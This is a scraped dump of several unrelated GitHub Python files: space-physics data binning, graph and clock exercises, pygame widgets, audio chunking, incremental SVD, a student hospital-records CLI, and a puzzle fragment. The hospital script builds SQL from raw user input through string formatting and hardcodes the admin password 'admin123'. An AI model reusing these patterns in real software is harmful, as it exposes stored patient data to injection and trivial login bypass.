range(int(np.ceil(trough.shape[0] / batch_size))):\n print(batch, np.ceil(trough.shape[0] / batch_size))\n i1 = batch * batch_size\n i2 = min((batch + 1) * batch_size, trough.shape[0] - 1)\n start = tec_times[i1]\n end = tec_times[i2] + np.timedelta64(1, 'h')\n dmsp, dmsp_times = io.get_dmsp_data(start, end)\n\n bins = [np.arange(start, end, np.timedelta64(1, 'h')), np.arange(29.5, 90),\n np.arange(-12, 12 + 24 / 360, 48 / 360)]\n t = []\n mlat = []\n mlt = []\n flow = []\n for sat, sat_data in dmsp.items():\n t.append(dmsp_times.astype(int))\n mlat.append(sat_data['mlat'])\n mlt.append(sat_data['mlt'])\n flow.append(sat_data['hor_ion_v'])\n t, mlat, mlt, flow = utils.concatenate(t, mlat, mlt, flow)\n mlt[mlt > 12] -= 24\n sample = np.column_stack((t, mlat, mlt))\n mask = (mlat >= 30) & np.isfinite(flow)\n flow_grid_count[i1:i2] = binned_statistic_dd(sample[mask], flow[mask], 'count', bins).statistic\n flow_grid_sum[i1:i2] = binned_statistic_dd(sample[mask], flow[mask], 'sum', bins).statistic\n\n starts, stops = satellite.get_closest_segment(dmsp_times, dmsp['dmsp16']['mlat'], tec_times[i1:i2], 30)\n for start, stop in zip(starts, stops):\n saps = satellite.find_troughs_in_segment(dmsp['dmsp16']['mlat'][start:stop],\n -dmsp['dmsp16']['hor_ion_v'][start:stop], -300)\n plt.plot(dmsp['dmsp16']['hor_ion_v'][start:stop])\n for sap in saps:\n m, e1, e2 = sap\n plt.plot(m, dmsp['dmsp16']['hor_ion_v'][start:stop][m], 'rx')\n plt.show()\n\n np.savez('E:\\\\dmsp_flow\\\\flow_grid.npz', flow_grid_count=flow_grid_count, flow_grid_sum=flow_grid_sum)\n\n# fig, ax = plt.subplots(subplot_kw={'polar': True})\n# for sat, sat_data in dmsp.items():\n# m = sat_data['mlat'] > 30\n# ax.plot((sat_data['mlt'][m] - 6) * np.pi / 12, 90 - sat_data['mlat'][m], '.', label=sat)\n# plotting.format_polar_mag_ax(ax)\n# plt.legend()\n# plt.show()\n\nflow_data = np.load('E:\\\\dmsp_flow\\\\flow_grid.npz')\nfg_sum = flow_data['flow_grid_sum']\nfg_count = 
flow_data['flow_grid_count']\nfg_sum[~trough] = 0\nfg_count[~trough] = 0\n\nfg = fg_sum / fg_count\nsaps = fg > 500\nnon_saps = fg < 500\n\"\"\"","repo_name":"gregstarr/ttools","sub_path":"ttools/old.py","file_name":"old.py","file_ext":"py","file_size_in_byte":8650,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"34127533894","text":"import utils \nimport sys\nimport networkx as nx\nfrom pyvis.network import Network\n\ndata_file = 'data.xml'\ndata_root = utils.getRoot(data_file)\n\nmap_file = 'map.xml'\nmap_root = utils.getRoot(map_file)\n\nmap_list = []\n\"\"\"\n map_list = list of mapping \n mapping = (task, node)\n\"\"\"\nfor bind in map_root.findall('bind'):\n task = bind.find('task').get('value')\n node = bind.find('node').get('value')\n map_list.append((int(task), int(node)))\n\ntasks_list = []\n\"\"\"\n tasks_list = list of tasks\n task = [id, requirement, generate]\n\"\"\"\nfor tasks in data_root.findall('tasks'):\n for task in tasks:\n single_task = []\n requirement_dict = {} \n task_id = task.attrib['id']\n single_task.append(task_id)\n for requirement in task.findall(\".//requires/requirement\"): \n type_value = requirement.find('type').get('value')\n source_value = requirement.find('source').get('value')\n count_min = requirement.find('count').get('min')\n requirement_dict['type'] = type_value\n requirement_dict['source'] = source_value\n requirement_dict['count_min'] = count_min\n\n single_task.append(requirement_dict)\n \n destination_dict = {} \n for destination in task.findall(\".//generates/possibility/destinations/destination\"): \n count = destination.find('count').get('min')\n type = destination.find('type').get('value')\n dest = destination.find('task').get('value')\n destination_dict['count'] = count \n destination_dict['type'] = type \n destination_dict['dest'] = dest \n \n single_task.append(destination_dict)\n tasks_list.append(single_task)\n\nprint(\"\\n--- Results ---\")\n\nprint(\"\\nRequire + Generate Info\")\nfor task in tasks_list:\n print(task)\n\nprint(\"\\nMapping\")\nprint(map_list)\n\n\nprint(\"\\nStarting Serious Business\")\n\nnet = Network(notebook=True, directed=True)\n\nfor bind in map_list:\n task = bind[0]\n node = bind[1]\n\n net.add_node(node)\n net.nodes[node][\"id\"] = task\n\n\n\n\n\n# for i in range(len(map_list)):\n# for task in tasks_list:\n# node_id = net.nodes[i]['id']\n# if node_id == int(task[0]):\n# \"\"\"Checking Generate\"\"\"\n# if len(task[2]) != 0:\n\n# print(\"Generate is not empty\")\n# net.add_edge(node_id, int(task[2]['dest']), label=\"G\", \n# count=task[2]['count'], \n# type=task[2]['type'])\n\n# \"\"\"Checking Require\"\"\"\n# if len(task[1]) != 0:\n# print(\"Require is not Empty\")\n# net.add_edge(node_id, int(task[1]['source']), label=\"R\", \n# count=task[1]['count_min'], \n# type=task[1]['type'])\n\n\n\n# # print(G.edges(data=True))\n# # utils.getNodeAttributes(G)\n# utils.visMultiDiGraph(net)","repo_name":"faseelmo/noc_graphs-","sub_path":"taskMap_vis.py","file_name":"taskMap_vis.py","file_ext":"py","file_size_in_byte":3056,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"28464188054","text":"# Lab 5 - 1 - 2\n# Nitin Nallagatla | CS7 | Summer 2019\n\nimport random\n\nprint(\"SAMPLE CLOCK DISPLAY\")\n\n# For loop calculates hours.\nfor n in range(1):\n randomHours = random.randint(1, 12)\n\n # For loop calculates minutes.\n for i in range(1):\n randomMinutes = random.randint(1, 59)\n\n # 
Calculates seconds and adds ten seconds to previous counts for 6 displays per minute.\n        randomSeconds = 0\n        for t in range(6):\n            print(format(randomHours, '02d'), \":\", format(randomMinutes, '02d'), \":\", format(randomSeconds, '02d'), sep='')\n            randomSeconds = randomSeconds + 10\n","repo_name":"nitin-nallagatla/LasPositasCollege","sub_path":"CS7/5 - 1 Problems/5 - 1 - 2 by Nitin Nallagatla.py","file_name":"5 - 1 - 2 by Nitin Nallagatla.py","file_ext":"py","file_size_in_byte":590,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"}
{"seq_id":"6710279175","text":"import pygame # , win32clipboard\n\nfrom components.componentsystem import Component\n\n\"\"\"\nI feel like all this code is kinda boring and self-explanatory, so I'm not gonna comment it. (Good luck :D)\n\"\"\"\n\npygame.font.init()\nDEFAULT_FONT = pygame.font.SysFont(\"Arial\", 20)\n\nclass ProgressBar(Component):\n    def __init__(self, location: tuple[int, int], \n                 size: tuple[int, int], value: int = 0, max_value: int = 100,\n                 bar_color: tuple[int, int, int] = (0, 255, 0),\n                 background_color: tuple[int, int, int] = (255, 255, 255),\n                 border_color: tuple[int, int, int] = (0, 0, 0),\n                 border_radius: int = 0, text_display: bool = False, text_color: tuple[int, int, int] = (0, 0, 0),\n                 text_font: pygame.font.Font = DEFAULT_FONT):\n        \n        super().__init__(location, size)\n        self.value = value\n        self.max = max_value\n        self.bar_color = bar_color\n        self.background_color = background_color\n        self.border_color = border_color\n        self.border_radius = border_radius\n        self.text_display = text_display\n        self.text_color = text_color\n        self.text_font = text_font\n\n    def draw(self, surface: pygame.Surface, environment: dict):\n        self.value = max(0, min(self.value, self.max))\n        pygame.draw.rect(surface, self.border_color, (self.location[0], self.location[1], self.size[0], self.size[1]), border_radius=self.border_radius)\n        pygame.draw.rect(surface, self.background_color, (self.location[0] + 1, self.location[1] + 1, self.size[0] - 2, self.size[1] - 2), border_radius=self.border_radius)\n        pygame.draw.rect(surface, self.bar_color, (self.location[0] + 1, self.location[1] + 1, (self.size[0] - 2) * (self.value / self.max), self.size[1] - 2), border_radius=self.border_radius)\n\n        if self.text_display:\n            # draw the text in the center of the bar\n            text = self.text_font.render(f\"{int(self.value)}/{int(self.max)}\", True, self.text_color)\n            surface.blit(text, (self.location[0] + (self.size[0] / 2) - (text.get_width() / 2), self.location[1] + (self.size[1] / 2) - (text.get_height() / 2)))\n\nclass TextDisplay(Component):\n    def __init__(self, location: tuple[int, int], text: str,\n                 font: pygame.font.Font = DEFAULT_FONT, color: tuple[int, int, int] = (0, 0, 0)):\n        super().__init__(location, (0, 0))\n        self.text = text\n        self.font = font\n        self.color = color\n\n    def setText(self, text: str):\n        self.text = text\n    \n    def draw(self, surface: pygame.Surface, environment: dict):\n        surface.blit(self.font.render(self.text, True, self.color), self.location)\n\nclass ImageDisplay(Component):\n    def __init__(self, location: tuple[int, int], image: pygame.Surface):\n        super().__init__(location, (0, 0))\n        self.image = image\n    \n    def draw(self, surface: pygame.Surface, environment: dict):\n        surface.blit(self.image, self.location)\n\nclass TextInput(Component):\n    def __init__(self, location: tuple[int, int], size: tuple[int, int], text: str = \"\",\n                 font: pygame.font.Font = DEFAULT_FONT, color: tuple[int, int, int] = (0, 0, 0),\n                 prompt_text: str = \"Enter 
text...\", prompt_color: tuple[int, int, int] = (200, 200, 200),\n prompt_font: pygame.font.Font = DEFAULT_FONT,\n border_radius: int = 0,\n background_color: tuple[int, int, int] = (0, 0, 0),\n text_color: tuple[int, int, int] = (255, 255, 255),\n padding_left: int = 5, padding_right: int = 0,\n padding_top: int = 0, padding_bottom: int = 0,\n max_length: int = -1):\n\n super().__init__(location, size)\n self.EVENT_SYSTEM_HOOKED = True # Tells the event system to give this component events\n\n # Display config ===============================\n self.text = text\n self.font = font\n self.color = color\n self.prompt_text = prompt_text\n self.prompt_color = prompt_color\n self.prompt_font = prompt_font\n self.border_radius = border_radius\n self.background_color = background_color\n self.text_color = text_color\n self.padding_left = padding_left\n self.padding_right = padding_right\n self.padding_top = padding_top\n self.padding_bottom = padding_bottom\n self.max_length = max_length\n\n self.CARET_BLINK_TIME = 500 # ms\n self._caret_blink_timer = 0\n self._caret_visible = True\n\n # Internal config ==============================\n self._selected = False\n self._keys_pressed = []\n\n \n def draw(self, surface: pygame.Surface, environment: dict):\n if self._caret_visible:\n self._caret_blink_timer -= environment[\"time_delta\"]\n if self._caret_blink_timer <= 0:\n self._caret_blink_timer = self.CARET_BLINK_TIME\n self._caret_visible = False\n else:\n self._caret_blink_timer -= environment[\"time_delta\"]\n if self._caret_blink_timer <= 0:\n self._caret_blink_timer = self.CARET_BLINK_TIME\n self._caret_visible = True\n\n pygame.draw.rect(surface, self.background_color, (self.location[0], self.location[1], self.size[0], self.size[1]), border_radius=self.border_radius)\n\n # if the padding is 0 on top and bottom, then the text will be centered\n if self.padding_top == 0 and self.padding_bottom == 0:\n textY = self.location[1] + (self.size[1] / 2) - (self.font.size(self.text)[1] / 2)\n else: textY = self.location[1] + self.padding_top\n\n # if the padding is 0 on left and right, then the text will be centered\n if self.padding_left == 0 and self.padding_right == 0: \n textX = self.location[0] + (self.size[0] / 2) - (self.font.size(self.text)[0] / 2)\n else: textX = self.location[0] + self.padding_left\n\n visableText = self.text\n if self._selected and self._caret_visible:\n visableText += \"|\"\n else: visableText += \" \" # stop the text from jumping around when the caret is not visible\n while self.font.size(visableText)[0] > self.size[0] - self.padding_left - self.padding_right:\n # trim a chracter off the front of the text\n visableText = visableText[1:]\n\n if self.text.strip() == \"\" and not self._selected:\n surface.blit(self.font.render(self.prompt_text, True, self.prompt_color), (textX, textY))\n else:\n surface.blit(self.font.render(visableText, True, self.text_color), (textX, textY))\n\n def onEvent(self, event: pygame.event.Event):\n if event.type == pygame.MOUSEBUTTONDOWN:\n if self.location[0] <= event.pos[0] <= self.location[0] + self.size[0] and self.location[1] <= event.pos[1] <= self.location[1] + self.size[1]:\n self._selected = True\n else:\n self._selected = False\n\n if event.type == pygame.KEYDOWN:\n if self._selected:\n # check if ctrl and v are pressed\n if pygame.K_LCTRL in self._keys_pressed and event.key == pygame.K_v:\n # get the text from the clipboard\n # win32clipboard.OpenClipboard()\n # self.text += win32clipboard.GetClipboardData()\n # 
win32clipboard.CloseClipboard()\n if self.max_length != -1 and len(self.text) > self.max_length:\n self.text = self.text[:self.max_length]\n elif event.key == pygame.K_BACKSPACE:\n self.text = self.text[:-1]\n else:\n if self.max_length == -1 or len(self.text) < self.max_length:\n self.text += event.unicode\n if event.key not in self._keys_pressed:\n self._keys_pressed.append(event.key)\n elif event.type == pygame.KEYUP:\n if event.key in self._keys_pressed:\n self._keys_pressed.remove(event.key)\n\nclass Button(Component):\n def __init__(self, location: tuple[int, int], size: tuple[int, int], text: str = \"\",\n font: pygame.font.Font = DEFAULT_FONT, color: tuple[int, int, int] = (255, 255, 255),\n background_color: tuple[int, int, int] = (0, 0, 0),\n hover_background_color: tuple[int, int, int] = (0, 0, 0),\n border_radius: int = 0,\n padding_left: int = 0, padding_right: int = 0,\n padding_top: int = 0, padding_bottom: int = 0,\n on_click: callable = lambda: None):\n super().__init__(location, size)\n self.EVENT_SYSTEM_HOOKED = True # Tells the event system to give this component events\n\n self.text = text\n self.font = font\n self.color = color\n self.background_color = background_color\n self.border_radius = border_radius\n self.padding_left = padding_left\n self.padding_right = padding_right\n self.padding_top = padding_top\n self.padding_bottom = padding_bottom\n self.hover_background_color = hover_background_color\n self.on_click = on_click\n\n self._hovered = False\n\n def draw(self, surface: pygame.Surface, environment: dict):\n pygame.draw.rect(surface, (self.background_color if not self._hovered else self.hover_background_color), (self.location[0], self.location[1], self.size[0], self.size[1]), border_radius=self.border_radius)\n\n # if the padding is 0 on top and bottom, then the text will be centered\n if self.padding_top == 0 and self.padding_bottom == 0:\n textY = self.location[1] + (self.size[1] / 2) - (self.font.size(self.text)[1] / 2)\n else: textY = self.location[1] + self.padding_top\n\n # if the padding is 0 on left and right, then the text will be centered\n if self.padding_left == 0 and self.padding_right == 0: \n textX = self.location[0] + (self.size[0] / 2) - (self.font.size(self.text)[0] / 2)\n else: textX = self.location[0] + self.padding_left\n\n surface.blit(self.font.render(self.text, True, self.color), (textX, textY))\n\n def onEvent(self, event: pygame.event.Event):\n if event.type == pygame.MOUSEBUTTONDOWN:\n if (self.location[0] <= event.pos[0] <= self.location[0] + self.size[0] \n and self.location[1] <= event.pos[1] <= self.location[1] + self.size[1]):\n self.on_click()\n\n elif event.type == pygame.MOUSEMOTION:\n self._hovered = (self.location[0] <= event.pos[0] <= self.location[0] + self.size[0] \n and self.location[1] <= event.pos[1] <= self.location[1] + self.size[1])\n \nclass ImageButton(Component):\n def __init__(self, location: tuple[int, int], image: pygame.Surface, \n click_image: pygame.Surface = None, \n hover_image: pygame.Surface = None, on_click: callable = lambda: None,\n text: str = None, font: pygame.font.Font = DEFAULT_FONT, text_color: tuple[int, int, int] = (255, 255, 255)):\n super().__init__(location, image.get_size())\n self.EVENT_SYSTEM_HOOKED = True\n\n self.image = image\n self.click_image = click_image\n self.hover_image = hover_image\n self.on_click = on_click\n self.text = text\n self.font = font\n self.text_color = text_color\n\n self._hovered = False\n \n def draw(self, surface: pygame.Surface, environment: dict):\n if 
self._hovered and self.hover_image:\n surface.blit(self.hover_image, self.location)\n else:\n surface.blit(self.image, self.location)\n \n if self.text:\n surface.blit(self.font.render(self.text, True, self.text_color), (self.location[0] + self.size[0] / 2 - self.font.size(self.text)[0] / 2, \n self.location[1] + self.size[1] / 2 - self.font.size(self.text)[1] / 2))\n\n def onEvent(self, event: pygame.event.Event):\n if event.type == pygame.MOUSEBUTTONDOWN:\n if (self.location[0] <= event.pos[0] <= self.location[0] + self.size[0] \n and self.location[1] <= event.pos[1] <= self.location[1] + self.size[1]):\n self.on_click()\n\n elif event.type == pygame.MOUSEMOTION:\n self._hovered = (self.location[0] <= event.pos[0] <= self.location[0] + self.size[0] \n and self.location[1] <= event.pos[1] <= self.location[1] + self.size[1])","repo_name":"DylanBruner/SurvivalGame","sub_path":"components/components.py","file_name":"components.py","file_ext":"py","file_size_in_byte":12684,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"41828901765","text":"\n# %% Packages\n\nimport os\nfrom pydub import AudioSegment\nfrom pydub.utils import make_chunks\nfrom ml_classes.task import MLTask\nfrom tqdm import tqdm\n\n# %% Classes\n\n\nclass CreateSoundSnippets(MLTask):\n \"\"\"This task chops a longer track into smaller sound pieces\"\"\"\n\n name = \"make_chunks\"\n\n def __init__(self, config):\n super().__init__(config)\n self.config = config\n\n def run(self):\n\n # Delete existing files and create necessary folders\n self.clear_output_path()\n\n # Chop the long sound-track\n self.chopping_sound()\n\n def chopping_sound(self) -> None:\n \"\"\"This file takes the (large) inputted sound file and then chops\n it down into smaller pieces. Every single snippet is then\n saved as a wav file itself. To keep better track, an intuitive\n naming system is used. 
This keeps the files in order.\n        \"\"\"\n        input_path = self.paths.get_string(\"input_path\")\n        output_path = self.paths.get_string(\"output_path\")\n        chunk_length_ms = self.parameters.get_int(\"chunk_length_ms\")\n\n        mix_files = [x for x in os.listdir(input_path) if x.endswith(\".wav\")]\n        for file in mix_files:\n            file_path = os.path.join(input_path, file)\n            myaudio = AudioSegment.from_file(file_path, \"wav\")\n            chunks = make_chunks(myaudio, chunk_length_ms)\n            number_of_digits_of_length = len(str(len(chunks)))\n            category_name = file.split(\"_mix\")[0]\n\n            for i, chunk in tqdm(enumerate(chunks)):\n                padding = number_of_digits_of_length - len(str(i))\n                chunk_name = f\"{category_name}_{padding*'0'}{str(i)}.wav\"\n                file_output_path = os.path.join(output_path, chunk_name)\n                chunk.export(file_output_path, format=\"wav\")\n","repo_name":"data4help/crispy-train","sub_path":"src/tasks/etl/create_snippets.py","file_name":"create_snippets.py","file_ext":"py","file_size_in_byte":1822,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"}
{"seq_id":"6507692517","text":"import numpy as np\nimport scipy.linalg as la\n\n\ndef incremental_svd_cols(u, s, vt, B, k):\n    s = np.diag(s)\n    cat_usb = np.concatenate((u @ s, B), axis=1)\n    Q, R = la.qr(cat_usb, mode='full')\n    u_bar, s_bar, vt_bar = la.svd(R)\n    u_bar = u_bar[:, :k]\n    s_bar = s_bar[:k]\n    vt_bar = vt_bar[:k, :]\n\n    v_correction = np.zeros((vt.shape[0] + B.shape[1], vt.shape[1] + B.shape[1]))\n    v_correction[:vt.shape[0], :vt.shape[1]] = vt\n    idxs_row = range(vt.shape[0], vt.shape[0] + B.shape[1])\n    idxs_col = range(vt.shape[1], vt.shape[1] + B.shape[1])\n    v_correction[idxs_row, idxs_col] = 1\n\n    u_res = Q @ u_bar\n    s_res = s_bar\n    vt_res = vt_bar @ v_correction\n\n    u_res, vt_res = svd_sign_flip(u_res, vt_res)\n    return u_res, s_res, vt_res\n\n\ndef svd_sign_flip(u, v=None):\n    \"\"\" Solve sign indeterminacy for SVD decomposition.\n    from sklearn/utils/extmath.py/_deterministic_vector_sign_flip\n    \"\"\"\n    if v is not None:\n        max_abs_rows = np.argmax(np.abs(u), axis=0)\n        signs = np.sign(u[max_abs_rows, range(u.shape[1])])\n        v = v * signs[:, np.newaxis]\n        u = u * signs\n        return u, v\n    else:\n        max_abs_rows = np.argmax(np.abs(u), axis=1)\n        signs = np.sign(u[range(u.shape[0]), max_abs_rows])\n        u = u * signs[:, np.newaxis]\n        return u\n\n\ndef incremental_svd_rows(u, s, vt, B, k):\n    cat_usb = np.concatenate([vt.T * s.reshape(1, -1), B.T], axis=1)\n    Q, R = la.qr(cat_usb, mode='full')\n    v_bar, s_bar, u_bar_t = la.svd(R)\n\n    u_correction = np.zeros((u.shape[0] + B.shape[0], u.shape[1] + B.shape[0]))\n    u_correction[:u.shape[0], :u.shape[1]] = u\n    idxs_row = range(u.shape[0], u.shape[0] + B.shape[0])\n    idxs_col = range(u.shape[1], u.shape[1] + B.shape[0])\n    u_correction[idxs_row, idxs_col] = 1\n\n    u_res = u_correction @ u_bar_t.T[:, :k]\n    s_res = s_bar[:k]\n    vt_res = v_bar.T[:k, :] @ Q.T\n\n    u_res, vt_res = svd_sign_flip(u_res, vt_res)\n    return u_res, s_res, vt_res\n","repo_name":"AntonioCarta/cannon","sub_path":"cannon/laes/skl.py","file_name":"skl.py","file_ext":"py","file_size_in_byte":1973,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"60"}
{"seq_id":"14405190955","text":"import sqlite3\nimport os\nimport getpass\nimport matplotlib.pyplot as plt\n\ncon= sqlite3.connect(\"Hospital.db\")\ntc=0\n\ndef illnessAnalysis():\n    print(\"Illness Analysis and Summary \")\n    print(\"--------------------------------------------------------\")\n    q=\"select Illness,count(*) 
from Patient group by Illness \"\n cursor=con.execute(q)\n x=[]\n y=[]\n head=\"%20s %15s\"%(\"Illness\",\"Total\")\n print(head)\n print(\"--------------------------------------------------------\")\n for rec in cursor:\n x.append(rec[0])\n y.append(rec[1])\n r=\"%20s %15d\"%(rec[0],rec[1])\n print(r)\n print()\n plt.bar(x,y)\n plt.xlabel(\"Illness\")\n plt.ylabel(\"Patient Count\")\n plt.show()\n input(\"Press ENTER to return to Summary and Analysis Menu \")\n \ndef genderAnalysis():\n print(\"Gender Wise Patient Analysis \")\n print(\"------------------------------------------------------\")\n q=\"select Gender,count(*) from Patient group by Gender \"\n cursor=con.execute(q)\n x=[]\n y=[]\n head=\"%20s %15s\"%(\"Gender\",\"Total\")\n print(head)\n print(\"------------------------------------------------------\")\n for rec in cursor:\n x.append(rec[0])\n y.append(rec[1])\n r=\"%20s %15d\"%(rec[0],rec[1])\n print(r)\n print()\n plt.bar(x,y)\n plt.xlabel(\"Gender\")\n plt.ylabel(\"Patient Count\")\n plt.show()\n input(\"Press ENTER to return to Summary and Analysis Menu \")\n\ndef ageAnalysis():\n print(\"Age Wise Patient Analysis \")\n print(\"--------------------------------------------------------\")\n q=\"select Age,count(*) from Patient group by Age \"\n cursor=con.execute(q)\n x=[]\n y=[]\n head=\"%10s %15s\"%(\"Age\",\"Total\")\n print(head)\n print(\"--------------------------------------------------------\")\n for rec in cursor:\n x.append(rec[0])\n y.append(rec[1]) \n r=\"%10d %15d\"%(rec[0],rec[1])\n print(r)\n print()\n plt.bar(x,y)\n plt.xlabel(\"Age\")\n plt.ylabel(\"Patient Count\")\n plt.show()\n input(\"Press ENTER to return to Summary and Analysis Menu \")\n \ndef isPresent(pname):\n q=\"select * from Patient where Name='%s'\"%(pname)\n cursor=con.execute(q)\n s=cursor.fetchall()\n if len(s)==0:\n return False\n else:\n return True\n\n \nwhile True:\n os.system(\"cls\")\n print(\"--------------------------------------------------------------\")\n print(\"--------------------------------------------------------------\")\n print(\"WELCOME TO STAR HEALTH HOSPITAL \")\n print(\"--------------------------------------------------------------\")\n print(\"--------------------------------------------------------------\")\n print(\"There's nothing more important than your good health-- That's our capital asset :)\")\n print(\"--------------------------------------------------------------\")\n print(\"--------------------------------------------------------------\")\n print(\"1. Press '1' if you want to book an appointment \")\n print(\"2. Press '2' to see the list of all patients \")\n print(\"3. Press '3' to see the list of all doctors/nurse staff \")\n print(\"4. Press '4' for summary and analysis \")\n print(\"5. Press '5' to update details of any patient \")\n print(\"6. 
Exit \")\n    print(\"--------------------------------------------------------------\")\n    ch=int(input(\"Please enter your choice \"))\n\n    if ch==1:\n        os.system(\"cls\")\n        print(\"BOOK AN APPOINTMENT\")\n        print(\"-------------------\")\n\n        pname=input(\"Enter Patient's Name : \")\n        if isPresent(pname):\n            print(\"Entered Patient already has an appointment \")\n            \n            input(\"Press ENTER to return to MAIN MENU \")\n            continue\n        \n        age=int(input(\"Enter Patient's Age :\"))\n        gen=input(\"Enter Patient's Gender :\")\n        cno=input(\"Enter Contact Number :\")\n        add=input(\"Enter Address :\")\n        ill=input(\"Kindly enter the illness/disease or the reason to see the doctor :\")\n        q=\"insert into Patient values('%s', %d, '%s', '%s', '%s', '%s')\"%(pname,age,gen,cno,add,ill)\n        con.execute(q)\n        con.commit()\n        nc=con.total_changes \n        n=nc-tc\n        print(\"Appointment Booked \")\n        input(\"Press Enter to return to MAIN MENU \")\n        tc=nc\n    \n    elif ch==2:\n        os.system(\"cls\")\n        uid=input(\"Admin ID: \")\n        pwd=getpass.getpass()\n        if uid==\"admin\" and pwd==\"admin123\":\n            print(\"List of Patients \")\n            print(\"-----------------------------------------------------------------------------------------------------------------------\")\n            cursor=con.execute(\"Select * from Patient \")\n            head=\"%20s %3s %6s %10s %20s %25s\"%(\"Patient's Name\",\"Age\",\"Gender\",\"Contact No.\",\"Address\",\"Illness\")\n            print(head)\n            print(\"-----------------------------------------------------------------------------------------------------------------------\")\n            for rec in cursor:\n                r=\"%20s %3d %6s %10s %20s %25s\"%(rec[0],rec[1],rec[2],rec[3],rec[4],rec[5])\n                print(r)\n            print(\"-----------------------------------------------------------------------------------------------------------------------\")\n            \n            input(\"Press ENTER to return to MAIN MENU \")\n        else:\n            print(\"Incorrect Admin ID/Password \")\n            print(\"----------------------------\")\n            input(\"Press ENTER to return to MAIN MENU \")\n    elif ch==3:\n        os.system(\"cls\")\n        print(\"Enter 'D' to see the list of Doctors \")\n        print(\"Enter 'N' to see the list of Nurses \")\n        ch1=input(\"Enter your choice \")\n        if ch1=='D':\n            print(\"List of Doctors \")\n            print(\"--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------\")\n            cursor=con.execute(\"select * from Doctor \")\n            head=\"%20s %20s %10s %20s %6s\"%(\"Doctor's Name\",\"Speciality\",\"Contact No.\",\"Appointment Hours\",\"Fees(in Rupees)\")\n            print(head)\n            print(\"--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------\")\n            for rec in cursor:\n                r=\"%20s %20s %10s %20s %6s\"%(rec[0],rec[1],rec[2],rec[3],rec[4])\n                print(r)\n            print(\"--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------\")\n            \n            input(\"Press ENTER to return to MAIN MENU \") \n        elif ch1=='N':\n            print(\"List of Nurses \")\n            print(\"-------------------------------------------------------------------------------------------------------------\")\n            cursor=con.execute(\"select * from Nurse \")\n            head=\"%20s %20s %15s\"%(\"Name\",\"Joined Since\",\"Working hours\")\n            print(head)\n            print(\"-------------------------------------------------------------------------------------------------------------\")\n            for rec in cursor:\n                r=\"%20s %20s %15s\"%(rec[0],rec[1],rec[2])\n                print(r)\n            print(\"-------------------------------------------------------------------------------------------------------------\")\n            input(\"Press ENTER to return to MAIN MENU \")\n        else:\n            print(\"Invalid choice \")\n            print(\"Kindly enter a valid choice \")\n            \n    elif ch==4:\n        os.system(\"cls\")\n        print(\"Summary and Analysis \")\n        print(\"----------------------------------------\")\n        uid=input(\"Admin ID: \")\n        pwd=getpass.getpass()\n        if uid==\"admin\" and pwd==\"admin123\":\n            while True:\n                os.system(\"cls\")\n                print(\"1. Illness Analysis \")\n                print(\"2. Gender Analysis \")\n                print(\"3. Age Analysis \")\n                print(\"4. Return to MAIN MENU \")\n                print(\"----------------------------------------\")\n                ch2=int(input(\"Enter your choice \"))\n                if ch2==1:\n                    illnessAnalysis()\n                elif ch2==2:\n                    genderAnalysis()\n                elif ch2==3:\n                    ageAnalysis()\n                elif ch2==4:\n                    break\n                else:\n                    print(\"Invalid choice \")\n                    input(\"Press ENTER \")\n        else:\n            print(\"Incorrect Admin ID/Password \")\n            print(\"----------------------------\")\n            input(\"Press ENTER to return to MAIN MENU \") \n        \n    elif ch==5:\n        os.system(\"cls\")\n        uid=input(\"Admin ID: \")\n        pwd=getpass.getpass()\n        if uid==\"admin\" and pwd==\"admin123\":\n            print(\"Update Patient Details\")\n            print(\"--------------------------------------------------------------------------------------------------------------------------\")\n            pname=input(\"Enter patient's name you want to update details of: \")\n            if isPresent(pname): \n                age=int(input(\"Enter Patient's Age :\"))\n                gen=input(\"Enter Patient's Gender :\")\n                cno=input(\"Enter Contact Number :\")\n                add=input(\"Enter Address :\")\n                ill=input(\"Kindly enter the illness/disease or the reason to see the doctor :\")\n                q=\"update Patient set Age=%d,Gender='%s',ContactNo='%s',Address='%s',Illness='%s' where Name='%s' \"%(age,gen,cno,add,ill,pname)\n                con.execute(q)\n                con.commit()\n                nc=con.total_changes\n                n=nc-tc\n                print(n,\"Details Updated \")\n                print(\"--------------------------------------------------------------------------------------------------------------------------\")\n                input(\"Press ENTER to return to MAIN MENU \")\n                tc=nc\n            else:\n                print(\"Entered Patient is not present \")\n                print(\"--------------------------------------------------------------------------------------------------------------------------\")\n                input(\"Press ENTER to return to MAIN MENU \")\n        else:\n            print(\"Incorrect Admin ID/Password \")\n            print(\"----------------------------\")\n            input(\"Press ENTER to return to MAIN MENU \") \n\n    elif ch==6:\n        print(\"HAVE A GREAT DAY :)\")\n        break\ncon.close() \n    \n    \n    \n\n    \n    \n    \n","repo_name":"Apurv-Chauhan/PYTHONPROJECT","sub_path":"HospitalProject.py","file_name":"HospitalProject.py","file_ext":"py","file_size_in_byte":11008,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"}
{"seq_id":"71638135872","text":"import argparse\r\n\r\n\r\ndef parse_bliz_data(map_input):\r\n    bliz_data = {'>': [], 'v': [], '<': [], '^': []}\r\n    for r, row in enumerate(map_input):\r\n        for c, char in enumerate(row):\r\n            if char in bliz_data:\r\n                bliz_data[char].append((r, c))\r\n    return bliz_data\r\n\r\n\r\ndef move(src, des, bliz_data, max_r, max_c):\r\n    pos = [src]\r\n    i = 0\r\n    while des not in pos:\r\n        # print(i, len(pos), pos[-1])\r\n        new_pos = []\r\n        for bliz, bliz_pos in 
